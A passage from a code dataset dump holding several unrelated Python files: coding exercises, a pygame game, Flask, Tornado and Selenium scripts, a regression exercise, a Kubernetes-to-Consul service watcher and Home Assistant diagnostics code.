print(self.childLayer+1,frontstate,tmps)\n self.childTab[frontstate].childAddStateList(tmps)\n def addChildState(self,childState):\n \n #增加子节点状态\n self.stateList.append(childState)\n if len(self.stateList) > self.maxdeep:\n self.stateList.pop(0)\n\n self.addStateList(self.stateList)\n \n #获取子树分支序列\n def getStateListChildTree(self,pSlist):\n\n if len(pSlist) == 1 and (pSlist[0] in self.childTab):\n return self.childTab[pSlist[0]]\n else:\n tmps = list(pSlist)\n\n childTree = None\n p = tmps.pop(0)\n if p in self.childTab:\n childTree = self.childTab[p].getStateListChildTree(tmps)\n\n return childTree\n\n #分析未来pDeep分钟深度的最大概率和最小概率分布\n def analysisChildStateForDeep(self,pDeep):\n if pDeep <= 1:\n maxc = 0\n count = 0\n deepchild = []\n for c in self.childTab.keys():\n if self.childTab[c].stateCount > maxc:\n maxc = self.childTab[c].stateCount\n deepchild = [self.childTab[c]]\n elif self.childTab[c].stateCount == maxc:\n deepchild.append(self.childTab[c])\n\n count += self.childTab[c].stateCount\n outdeep = []\n for d in deepchild:\n outdeep.append([d,count,len(self.childTab)])\n return outdeep\n else:\n deepdata = []\n maxpCount = 0.0\n for c in self.childTab.keys():\n tmpdeep = self.childTab[c].analysisChildStateForDeep(pDeep - 1)\n if tmpdeep:\n deepchild = tmpdeep[0][0]\n count = tmpdeep[0][1]\n childcount = tmpdeep[0][2]\n if count != 0:\n d = deepchild[0]\n tmp = (d.stateCount/float(count))\n if maxpCount < tmp:\n maxpCount = tmp\n deepdata = []\n for d in tmpdeep:\n deepdata.append([d[0],d[1],d[2]])\n elif maxpCount == tmp:\n for d in tmpdeep:\n deepdata.append([d[0],d[1],d[2]])\n\n return deepdata\n\n def getChildLeaf(self,outlist,child,pdeep):\n for c in child.childTab.keys():\n ch = child.childTab[c]\n if pdeep == 0:\n outlist.append(ch)\n else:\n ch.getChildLeaf(outlist,ch,pdeep = pdeep - 1)\n\n def getChildLeafForDeep(self,deep):\n outlist = []\n self.getChildLeaf(outlist, self, deep-1)\n # count1 = 0\n # count2 = 0\n # count3 = 0\n # count4 = 0\n # count5 = 0\n # out = []\n # for c1 in self.childTab.keys():\n # ch1 = self.childTab[c1]\n # count1 += ch1.stateCount\n # tmpcount5 = ch1.stateCount\n # for c2 in ch1.childTab.keys():\n # ch2 = ch1.childTab[c2]\n # count2 += ch2.stateCount\n # tmpcount5 += ch2.stateCount\n # for c3 in ch2.childTab.keys():\n # ch3 = ch2.childTab[c3]\n # count3 += ch3.stateCount\n # tmpcount5 += ch3.stateCount\n # for c4 in ch3.childTab.keys():\n # ch4 = ch3.childTab[c4]\n # count4 += ch4.stateCount\n # tmpcount5 += ch4.stateCount\n # for c5 in ch4.childTab.keys():\n # ch5 = ch4.childTab[c5]\n # count5 += ch5.stateCount\n # tmpcount5 += ch5.stateCount\n # out.append([ch5,tmpcount5])\n \n return outlist\n\ndef getChilds(tree,layers,deeps,layerdeep,startdeeps):\n for c in tree.childTab.keys():\n chtmp = tree.childTab[c]\n if len(layers) <= layerdeep:\n layers.append([])\n if len(deeps) <= layerdeep:\n deeps.append([])\n layerstr = 'layer%d'%(layerdeep + 1)\n layers[layerdeep].append([layerstr,c,len(chtmp.childTab),chtmp.stateCount,chtmp.childLayer])\n tmpd = [] + startdeeps\n tmpd.append(c)\n deeps[layerdeep].append(tmpd)\n getChilds(chtmp, layers, deeps, layerdeep + 1,tmpd)\n\ndef main():\n sts = [1,2,3,1,2,1,3]\n # sts = [1,2,3,1]\n treeobj = TreeObj(0,0,0,7)\n\n for s in sts:\n treeobj.addChildState(s)\n\n print(len(treeobj.childTab))\n print('-'*10)\n\n layers = []\n deeps = []\n\n getChilds(treeobj, layers, deeps, 0,[])\n\n for n in range(len(layers)):\n l = layers[n]\n print('------layer%d-------'%(n+1))\n for lx in l:\n print(lx)\n print('\\n')\n for n in range(len(deeps)):\n d = deeps[n]\n print('+++++++deep%d+++++++'%(n+1))\n for dx in d:\n print(dx)\n\n#测试\nif __name__ == '__main__':\n main()\n \n","sub_path":"pyscripte2/TreeObj.py","file_name":"TreeObj.py","file_ext":"py","file_size_in_byte":7416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"129690557","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 31 20:01:00 2019\n\n@author: masat\n\"\"\"\n#1番目の入力、整数aをうけとる。\na = input()\n#2番目の入力、空白で区切られた整数bとcをうけとる。\nb, c = input().split()\n#3番目の入力、文字列sをうけとる。\ns = input()\n\n#print(\"a = {}, type {}\".format(a, type(a)))\n#print(\"b = {}, type {}\".format(b, type(b)))\n#print(\"s = {}, type {}\".format(c, type(c)))\n#print(\"s = {}, type {}\".format(s, type(s)))\n\n#a, b, cをstr型からint型に変換する。\n[a, b, c] = map(int, [a, b, c])\n\n#print(\"a = {}, type {}\".format(a, type(a)))\n#print(\"b = {}, type {}\".format(b, type(b)))\n#print(\"s = {}, type {}\".format(c, type(c)))\n#print(\"s = {}, type {}\".format(s, type(s)))\n\n#a, b, cの和をとる。\nsum_abc = a + b + c\n\n#sum_abcとsを空白文字で区切って1行に出力する。出力の末尾に改行を加えて\nprint(\"{} {}\".format(sum_abc, s))\n","sub_path":"AtCoder_Python3/ABS/Welcome_to_AtCoder_HH1.py","file_name":"Welcome_to_AtCoder_HH1.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"394052993","text":"n = int(input())\na = list(map(int, input().split()))\n\nm = 1000\ns = 0\n\nfor i in range(n-1):\n if a[i] < a[i+1]:\n s = m // a[i]\n m += (a[i+1]-a[i]) * s\n\nprint(m)\n\n#溶けてないよ\n","sub_path":"Python_codes/p02603/s938798133.py","file_name":"s938798133.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"338250222","text":"import pygame, sys, random, time\nfrom pygame.locals import *\npygame.init()\n\n# Creates size of screen\nwindowSize= [640,480]\nscreen = pygame.display.set_mode(windowSize)\nclock = pygame.time.Clock()\n\nblue = pygame.color.Color('#0a32f4')\nred = pygame.color.Color('#ff0000')\nyellow = pygame.color.Color('#ffff00')\nblack = pygame.color.Color('#000000')\nwhite = pygame.color.Color('#ffffff')\nhalf_black = pygame.color.Color('#000000cc')\n\n#loads player image by using variable\nplayer = pygame.image.load(\"mario.png\")\n#changes the size\nplayer = pygame.transform.scale(player, (30,45))\n\n#.get_rect gets baasically the position of the image\npos = player.get_rect()\n\n#this is a list and saved the number 320 and 240\npos.center = [320,240]\n\n#font\nbasicFont = pygame.font.Font('freesansbold.ttf', 32)\n\n# Text\ngameOverSurf = basicFont.render(\"You survived:\", True, white)\ngameOverRect = gameOverSurf.get_rect()\ngameOverRect.center = (320, 130)\n\nmaxStars = 6\n\n\ndef main():\n #grabs the position 0 from the list pos and stores it in x which is 320\n playerx = pos.center[0]\n playery = pos.center[1]\n while True:\n runGame()\n\n\ndef runGame():\n\n \n \n global stars\n \n #starting player position\n playerx = (windowSize[0]/2)-40\n playery = 410\n\n pos.center = [playerx,playery]\n\n\n \n\n\n #list to hold star object\n stars = []\n\n # clock\n start = time.time()\n time.clock()\n elapsed = 0\n \n \n while True:\n\n # Create clock object\n clockSurf = basicFont.render(getTime(start, elapsed), True, white)\n clockRect = clockSurf.get_rect()\n clockRect.center = (320, 20)\n screen.fill(black)\n \n # Draw the floor\n pygame.draw.rect(screen, blue, [0, 440, windowSize[0], 40])\n\n\t\t\n # move falling stars\n for fsObj in stars:\n fsObj['y'] += fsObj['fallingVelocity']\n fsObj['rect'] = pygame.Rect((fsObj['x'], fsObj['y'], fsObj['width'], fsObj['height']))\n\t\t\t\n # draw falling stars\n drawStars()\n\t\t\n # remove off screen stars\n for i in range(len(stars) - 1, -1, -1):\n if stars[i]['y'] > 480:\n del stars[i]\n\t\t\n # add falling stars to list stars\n if len(stars) < maxStars:\n stars.append(createFallingStar())\n \n keys = pygame.key.get_pressed()\n \n\n if keys[K_a] or keys[K_LEFT]:\n playerx -= 10\n if keys[K_d] or keys[K_RIGHT]:\n playerx += 10\n\n if playerx + 40< 0:\n playerx = 500\n elif playerx > 600:\n playerx = 10\n\n pos.center = [playerx,playery]\n #sets up the screen with the image stored in player and in location of pos\n screen.blit(player, pos)\n #pygame.display.flip()\n # player = pygame.draw.rect(screen, red, [playerx, playery, 80, 40])\n \n\n # draw clock\n screen.blit(clockSurf, clockRect)\n\n # check if player collides with a star\n for i in range(len(stars) -1, -1, -1):\n star = stars[i]\n if pos.colliderect(star['rect']):\n print(\"hit\", pygame.time.get_ticks()*.001)\n endScreen(start, elapsed)\n return\n \n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n pygame.display.flip()\n clock.tick(60)\ndef endScreen(start, elapsed):\n # Fonts\n smallFont = pygame.font.Font('freesansbold.ttf', 16)\n largeFont = pygame.font.Font('freesansbold.ttf', 128)\n \n # Transparent overlay\n coverFill = pygame.Surface((640,480), pygame.SRCALPHA, 32)\n coverFill.fill(half_black)\n screen.blit(coverFill, (0,0))\n \n # Text\n endClockSurf = largeFont.render(getTime(start, elapsed), True, white)\n endClockRect = gameOverSurf.get_rect()\n endClockRect.center = (260, 160)\n \n gameOverSurf2 = smallFont.render(\"Press R to restart\", True, white)\n gameOverRect2 = gameOverSurf.get_rect()\n gameOverRect2.center = (360, 380)\n \n # draw the text\n screen.blit(gameOverSurf, gameOverRect)\n screen.blit(gameOverSurf2, gameOverRect2)\n screen.blit(endClockSurf, endClockRect)\n pygame.display.flip()\n\n while True:\t\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n elif event.key == pygame.K_r:\n return\n clock.tick(60)\n\ndef getTime(start, elapsed):\n seconds = int(time.time() - start)\n struct_time = time.gmtime(seconds)\n return time.strftime(\"%M:%S\", struct_time)\n\ndef createFallingStar():\n fs = {}\n randomSize = random.randint(30,40)\n fs['width'] = randomSize\n fs['height'] = randomSize\n fs['x'] = random.randint(0,600)\n fs['y'] = (-40)\n fs['fallingVelocity'] = random.randint(7, 13)\n fs['rect'] = pygame.Rect((fs['x'], fs['y'], fs['width'], fs['height']))\n return fs\n\ndef drawStars():\n for fsObj in stars:\n pygame.draw.rect(screen, yellow, [fsObj['x'], fsObj['y'], fsObj['width'], fsObj['height']])\n\n#function to close game\ndef terminate():\n pygame.quit()\n sys.exit()\n\nif __name__== '__main__':\n main()\n \n","sub_path":"clGameMario.py","file_name":"clGameMario.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"572174782","text":"import sqlite3\nimport os.path\nfrom contextlib import closing\n\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndb_path = os.path.join(BASE_DIR, \"blog.sqlite\")\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\ndef get_db():\n\n # attach db to global\n if \"db\" not in g:\n g.db = sqlite3.connect(\n db_path,\n detect_types=sqlite3.PARSE_DECLTYPES,\n isolation_level=\"DEFERRED\"\n )\n g.db.cursor().execute(\"PRAGMA journal_mode=WAL\")\n g.db.row_factory = dict_factory\n\n # return db\n return g.db\n\ndef query_db(query, args=(), one=False):\n\n # query and close cursor\n with closing(get_db().cursor().execute(query, args)) as cur:\n rv = cur.fetchall()\n return (rv[0] if rv else None) if one else rv\n\ndef close_db(e=None):\n\n # close connection\n db = g.pop('db', None)\n if db is not None:\n db.close()","sub_path":"flaskApp/db/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"43274928","text":"\n\nfrom browserLaunch import launchChrome as lp\nimport time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nlp.driver.get(\"https://www.redbus.in/\")\n\nlp.driver.find_element_by_css_selector(\"#src\").send_keys(\"Hyd\")\ntime.sleep(2)\nsrclist = lp.driver.find_elements_by_xpath(\"//ul[@class='autoFill']/li\")\n\nprint(\"No of pickup points\",len(srclist))\n\nfor li in srclist:\n # print(li.text)\n if li.text == \"Bhel, Hyderabad\":\n li.click()\n break\n\n\nlp.driver.find_element_by_css_selector(\"#dest\").send_keys(\"Bangalore (All Locations)\",Keys.ENTER)\n\nlp.driver.find_element_by_css_selector(\".icon-onward-calendar.icon\").click()\n\nonWardCal = lp.driver.find_elements_by_xpath(\"//div[@id='rb-calendar_onward_cal']/table/tbody/tr/td\")\n\nfor li in onWardCal:\n if li.text == \"10\":\n li.click()\n break\n\n\nlp.driver.find_element_by_css_selector(\".icon-return-calendar.icon\").click()\n\nreturnDate = lp.driver.find_elements_by_xpath(\"//div[@id='rb-calendar_return_cal']/table/tbody/tr/td\")\n\n\nfor li in returnDate:\n if li.text != \"Apr 2020\":\n lp.driver.find_element_by_xpath(\"(//button[text()='>'])[2]\").click()\n break\n\n\n\nreturnDate = lp.driver.find_elements_by_xpath(\"//div[@id='rb-calendar_return_cal']/table/tbody/tr/td\")\n\n\nfor li in returnDate:\n if li.text == \"20\":\n li.click()\n break\n\nlp.driver.find_element_by_css_selector(\"#search_btn\").click()\n\n\n\n\ntime.sleep(5)\n# lp.driver.quit()\n\n\n\n","sub_path":"SeleniumBuiltins/Autosuggest.py","file_name":"Autosuggest.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"587067113","text":"import tornado.web\nimport tornado.gen\nimport json\nimport io\nimport logging\n\nimport motor\n\nimport mickey.userfetcher\nfrom mickey.basehandler import BaseHandler\n\nclass BindHandler(BaseHandler):\n @tornado.web.asynchronous\n @tornado.gen.coroutine\n def post(self):\n publish = self.application.loginpublish\n token = self.request.headers.get(\"Authorization\", \"\")\n coll = self.application.db.users\n data = json.loads(self.request.body.decode(\"utf-8\"))\n bindkey = data.get(\"bindkey\", \"\")\n\n logging.info(\"begin to handle accept bind request %s\" % bindkey)\n \n if not bindkey:\n self.set_status(403)\n self.finish()\n return\n \n user = yield mickey.userfetcher.getcontact(self.p_userid, token) \n\n if not user:\n self.set_status(404)\n self.finish()\n return\n\n #send notify to pc client, bind request was accept\n notify = {}\n notify[\"type\"] = \"user_notify\"\n\n content = {}\n content[\"userid\"] = self.p_userid\n content[\"nickname\"] = user.get(\"commName\", \"\")\n\n notify[\"notify\"] = content\n\n publish.pushmsg(bindkey, notify)\n\n self.finish()\n","sub_path":"handlers/bindhandler.py","file_name":"bindhandler.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"577294549","text":"import os\n\nfrom flask import Flask\nfrom flask_bootstrap import Bootstrap\n\nfrom . import api, user, thing, db, mqtt_client\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n AMAZON_CLIENT_ID='client_id',\n AMAZON_CLIENT_SECRET='client_secret',\n MQTT_BROKER_URL='mqtt://localhost:1883',\n DATABASE=os.path.join(app.instance_path, 'cloud-controller.sqlite'),\n )\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n db.init_app(app)\n mqtt_client.init_app(app)\n Bootstrap(app)\n app.register_blueprint(user.bp)\n app.register_blueprint(thing.bp)\n app.register_blueprint(api.bp)\n\n return app\n","sub_path":"raspi-cloud-controller/cloud_flask/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"301590767","text":"import numpy\nimport pandas as pd\nfrom sklearn import linear_model\nimport scipy\nimport matplotlib.pyplot as plt\n\n\ndef polynomial_dataframe(feature, degree):\n df = pd.DataFrame()\n\n for power in range(1, degree + 1):\n col_name = 'power_' + str(power)\n df[col_name] = feature.apply(lambda x: numpy.power(x, power))\n\n return df\n\n\ndef get_rss(model, data, outcome):\n predictions = model.predict(data)\n residuals = outcome - predictions\n rss = numpy.sum(residuals * residuals)\n\n return rss\n\n\ndef get_polynomial_degree(training_set, validation_set, feature, target, max_degree):\n best_degree = 0\n best_rss = 0\n\n for degree in range(1, max_degree + 1):\n poly_data_training = polynomial_dataframe(training_set[feature], degree)\n poly_data_validation = polynomial_dataframe(validation_set[feature], degree)\n\n model = linear_model.LinearRegression()\n model.fit(poly_data_training, training_set[[target]])\n\n rss = get_rss(model, poly_data_validation, validation_set[[target]])\n\n if rss[0] < best_rss or degree == 1:\n best_rss = rss[0]\n best_degree = degree\n\n return best_degree\n\n\n# Load test and training data\ndtype_dict = {'bathrooms': float, 'waterfront': int, 'sqft_above': int, 'sqft_living15': float, 'grade': int,\n 'yr_renovated': int, 'price': float, 'bedrooms': float, 'zipcode': str, 'long': float,\n 'sqft_lot15': float, 'sqft_living': float, 'floors': str, 'condition': int, 'lat': float, 'date': str,\n 'sqft_basement': int, 'yr_built': int, 'id': str, 'sqft_lot': int, 'view': int}\n\nsales = pd.read_csv('data/kc_house_data.csv', index_col=0, dtype=dtype_dict)\nsales_set1 = pd.read_csv('data/wk3_kc_house_set_1_data.csv', index_col=0, dtype=dtype_dict)\nsales_set2 = pd.read_csv('data/wk3_kc_house_set_2_data.csv', index_col=0, dtype=dtype_dict)\nsales_set3 = pd.read_csv('data/wk3_kc_house_set_3_data.csv', index_col=0, dtype=dtype_dict)\nsales_set4 = pd.read_csv('data/wk3_kc_house_set_4_data.csv', index_col=0, dtype=dtype_dict)\n\n\n\n# Make a 1 degree polynomial dataframe with sales['sqft_living15'] as the the feature. This will be our output variable\n# Run linear regression to get weights and plot\n# Plot observations + prediction model for 1st degree polynomial\npoly1_data = polynomial_dataframe(sales['sqft_living'], 1)\n\nmodel_1 = linear_model.LinearRegression()\nmodel_1.fit(poly1_data, sales[['price']])\n\n# plt.plot(poly1_data[['power_1']], sales[['price']], '.',\n# poly1_data['power_1'], model_1.predict(poly1_data), '-')\n# plt.show()\n\n# Do the same for a 2nd degree polynomial\npoly2_data = polynomial_dataframe(sales['sqft_living'], 2)\n\nmodel_2 = linear_model.LinearRegression()\nmodel_2.fit(poly2_data, sales[['price']])\n\nplt.plot(poly2_data[['power_1']], sales[['price']], '.',\n poly2_data['power_1'], model_2.predict(poly2_data), '.')\nplt.show()\n\n\n# Do the same for a 15th degree polynomial, on each of the 4 subsets\npoly15_data_set1 = polynomial_dataframe(sales_set1['sqft_living'], 15)\nmodel_15_set1 = linear_model.LinearRegression()\nmodel_15_set1.fit(poly15_data_set1, sales_set1[['price']])\n\nprint(model_15_set1.intercept_)\nprint(model_15_set1.coef_)\n\n# plt.plot(poly15_data_set1['power_1'], sales_set1['price'], '.',\n# poly15_data_set1['power_1'], model_15_set1.predict(poly15_data_set1), '.')\n# plt.show()\n\npoly15_data_set2 = polynomial_dataframe(sales_set2['sqft_living'], 15)\nmodel_15_set2 = linear_model.LinearRegression()\nmodel_15_set2.fit(poly15_data_set2, sales_set2[['price']])\n\nprint(model_15_set2.intercept_)\nprint(model_15_set2.coef_)\n\n# plt.plot(poly15_data_set2['power_1'], sales_set2['price'], '.',\n# poly15_data_set2['power_1'], model_15_set2.predict(poly15_data_set2), '.')\n# plt.show()\n\npoly15_data_set3 = polynomial_dataframe(sales_set3['sqft_living'], 15)\nmodel_15_set3 = linear_model.LinearRegression()\nmodel_15_set3.fit(poly15_data_set3, sales_set3[['price']])\n\nprint(model_15_set3.intercept_)\nprint(model_15_set3.coef_)\n\n# plt.plot(poly15_data_set3['power_1'], sales_set3['price'], '.',\n# poly15_data_set3['power_1'], model_15_set3.predict(poly15_data_set3), '.')\n# plt.show()\n\npoly15_data_set4 = polynomial_dataframe(sales_set4['sqft_living'], 15)\nmodel_15_set4 = linear_model.LinearRegression()\nmodel_15_set4.fit(poly15_data_set4, sales_set4[['price']])\n\nprint(model_15_set4.intercept_)\nprint(model_15_set4.coef_)\nprint('******************************************')\n\n# plt.plot(poly15_data_set4['power_1'], sales_set4['price'], '.',\n# poly15_data_set4['power_1'], model_15_set4.predict(poly15_data_set4), '.')\n# plt.show()\n\n# Using the Training set, work out which polynomial degree produces the lowest RSS on the Validation set\nsales_training = pd.read_csv('data/wk3_kc_house_train_data.csv', index_col=0, dtype=dtype_dict)\nsales_validation = pd.read_csv('data/wk3_kc_house_valid_data.csv', index_col=0, dtype=dtype_dict)\nsales_test = pd.read_csv('data/wk3_kc_house_test_data.csv', index_col=0, dtype=dtype_dict)\n\nbest_polynomial_degree = get_polynomial_degree(sales_training, sales_validation, 'sqft_living', 'price', 15)\nprint(\"Best polynomial degree: \" + str(best_polynomial_degree))\n\n# Compute RSS on Test dataset using the polynomial degree obtained from Validation set\npoly_best = polynomial_dataframe(sales_test['sqft_living'], best_polynomial_degree)\n\nbest_model = linear_model.LinearRegression()\nbest_model.fit(poly_best, sales_test[['price']])\n\nrss_best_model = get_rss(best_model, poly_best, sales_test[['price']])\nprint(rss_best_model)\n\n","sub_path":"course2-regression/week3/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"155768108","text":"#\n# This script watches for changes to Kubernetes services.\n# It was inspired by the article https://medium.com/programming-kubernetes/building-stuff-with-the-kubernetes-api-part-3-using-python-aea5ab16f627\nimport os\nfrom kubernetes.config.config_exception import ConfigException\nimport requests\nfrom kubernetes import client, config, watch\nimport logging\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(threadName)s - %(levelname)s - %(message)s')\n\n# set the Consul agent URL and other variables\nconsul_url = \"http://40.113.218.45:8500\"\ndatacenter = \"dev\"\n\ncontrol_plane_host = \"40.113.218.45\"\ncontrol_plane_ip = \"40.113.218.45\"\n\ndef main(k8s_context=None):\n # setup the namespace\n logging.info(f\"Running service for Kubernetes cluster {k8s_context}\")\n ns = os.getenv(\"K8S_NAMESPACE\")\n if ns is None:\n ns = \"\"\n\n # configure client\n config.load_kube_config(context=k8s_context)\n api = client.CoreV1Api()\n\n # Setup new watch\n w = watch.Watch()\n logging.info(\"Watching for Kubernetes services for all namespaces\")\n\n for item in w.stream(api.list_service_for_all_namespaces, timeout_seconds=0):\n svc = item['object']\n\n # get the metadata labels\n labels = svc.metadata.labels\n # look for a label named \"registerWithMesh\"\n if not labels:\n logging.info('No label found')\n else:\n try:\n if labels['registerWithMesh'] == \"true\":\n register_flag = True\n else:\n register_flag = False\n except KeyError:\n register_flag = False\n logging.info(f\"label: registerWithMesh not found for service {svc.metadata.name}\")\n # notify consul about the service\n if register_flag == True:\n notify_consul(svc, item['type'])\n\n\n# Notify the Consul agent\ndef notify_consul(service, action):\n if service.spec.type in(\"NodePort\", \"ClusterIP\", \"LoadBalancer\"):\n ports = service.spec.ports\n for port in ports:\n #\t\t\tprint \"Port\", port\n full_name = service.metadata.namespace + \"-\" + service.metadata.name + \"-\" + (port.name if port.name else \"\")\n if action == 'ADDED':\n # if action == 'DELETED':\n logging.info(f\"Registering new service {full_name}\")\n # full_consul_url = consul_url + \"/v1/catalog/register\"\n full_consul_url = consul_url + \"/v1/agent/service/register\"\n # determine which port to use depending on the service port type\n if service.spec.type == \"NodePort\":\n final_host = control_plane_host\n final_address = control_plane_ip\n final_port = port.node_port\n if service.spec.type == \"ClusterIP\":\n final_host = service.spec.cluster_ip\n final_address = service.spec.cluster_ip\n final_port = port.port\n if service.spec.type == \"LoadBalancer\":\n final_host = service.status.load_balancer.ingress[0].ip\n final_address = service.status.load_balancer.ingress[0].ip\n final_port = port.port\n\n consul_json = {\n \"ID\": service.metadata.name,\n \"Name\": full_name,\n \"Tags\": [service.metadata.namespace],\n \"Address\": final_address,\n \"Port\": final_port,\n # \"Meta\": {\n # \"redis_version\": \"4.0\"},\n \"EnableTagOverride\": False,\n \"Check\": {\"DeregisterCriticalServiceAfter\": \"90m\",\n # \"Args\": [\"/usr/local/bin/check_redis.py\"],\n \"HTTP\": f\"http://{final_address}:{final_port}/health\",\n \"Interval\": \"90s\"\n }\n }\n logging.info(f\"request {full_consul_url} {consul_json}\")\n html_headers = {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\n response = requests.put(full_consul_url, json=consul_json, headers=html_headers)\n if response.status_code != 200:\n logging.info(f\"Status: {response.status_code} Headers: {response.headers} Response content: {response.text}\")\n\n if action == 'DELETED':\n # if action == 'ADDED':\n serviceID = service.metadata.name\n logging.info(f\"Deregistering {serviceID}\")\n full_consul_url = consul_url + \"/v1/agent/service/deregister/\" + serviceID\n # assemble the Consul API payload\n logging.info(full_consul_url)\n response = requests.put(full_consul_url)\n logging.info(response.status_code)\n if response.status_code != 200:\n logging.info('Status:', response.status_code, 'Headers:', response.headers, 'Response content:',\n response.text)\n else:\n logging.info(\"Skipping service\", service.metadata.name, \"becuase it is not a NodePort service type\")\n\n\nif __name__ == '__main__':\n main(k8s_context='Surfers2Cluster')\n","sub_path":"py-k8s-service_watch.py","file_name":"py-k8s-service_watch.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"466617156","text":"# This code is licensed under the MIT License (see LICENSE file for details)\nimport cffi\nimport pathlib\n\n# point-in-polygon code from: https://wrf.ecse.rpi.edu/Research/Short_Notes/pnpoly.html\n# nvert Number of vertices in the polygon. Whether to repeat the first vertex at the end is discussed below.\n# vertx, verty Arrays containing the x- and y-coordinates of the polygon's vertices.\n# testx, testy X- and y-coordinate of the test point.\n\n# LICENSE for the pnpoly_c code below:\n#\n# Copyright (c) 1970-2003, Wm. Randolph Franklin\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n#\n# Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimers.\n# Redistributions in binary form must reproduce the above copyright notice in the documentation and/or other materials provided with the distribution.\n# The name of W. Randolph Franklin may not be used to endorse or promote products derived from this Software without specific prior written permission.\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n\npnpoly_c = \"\"\"int pnpoly(int nvert, float *vertx, float *verty, float testx, float testy) {\n int i, j, c = 0;\n for (i = 0, j = nvert-1; i < nvert; j = i++) {\n if ( ((verty[i]>testy) != (verty[j]>testy)) &&\n\t (testx < (vertx[j]-vertx[i]) * (testy-verty[i]) / (verty[j]-verty[i]) + vertx[i]) )\n c = !c;\n }\n return c;\n}\n\"\"\"\n\npnpoly_h = pnpoly_c.split('\\n')[0][:-1] + ';'\n\nffibuilder = cffi.FFI()\ndirectory = pathlib.Path(__file__).parent\nffibuilder.cdef(pnpoly_h)\nffibuilder.set_source('zplib.curve._pnpoly', pnpoly_c)\n\nif __name__ == \"__main__\":\n ffibuilder.compile()\n","sub_path":"zplib/curve/build_pnpoly.py","file_name":"build_pnpoly.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100808027","text":"\"\"\"Diagnostics support for Asuswrt.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom homeassistant.components.diagnostics import async_redact_data\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_PASSWORD, CONF_USERNAME\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import device_registry as dr, entity_registry as er\n\nfrom .const import DATA_ASUSWRT, DOMAIN\nfrom .router import AsusWrtRouter\n\nTO_REDACT = {CONF_PASSWORD, CONF_USERNAME}\n\n\nasync def async_get_config_entry_diagnostics(\n hass: HomeAssistant, entry: ConfigEntry\n) -> dict[str, dict[str, Any]]:\n \"\"\"Return diagnostics for a config entry.\"\"\"\n data = {\"entry\": async_redact_data(entry.as_dict(), TO_REDACT)}\n\n router: AsusWrtRouter = hass.data[DOMAIN][entry.entry_id][DATA_ASUSWRT]\n\n # Gather information how this AsusWrt device is represented in Home Assistant\n device_registry = dr.async_get(hass)\n entity_registry = er.async_get(hass)\n hass_device = device_registry.async_get_device(\n identifiers=router.device_info[\"identifiers\"]\n )\n if not hass_device:\n return data\n\n data[\"device\"] = {\n \"name\": hass_device.name,\n \"name_by_user\": hass_device.name_by_user,\n \"disabled\": hass_device.disabled,\n \"disabled_by\": hass_device.disabled_by,\n 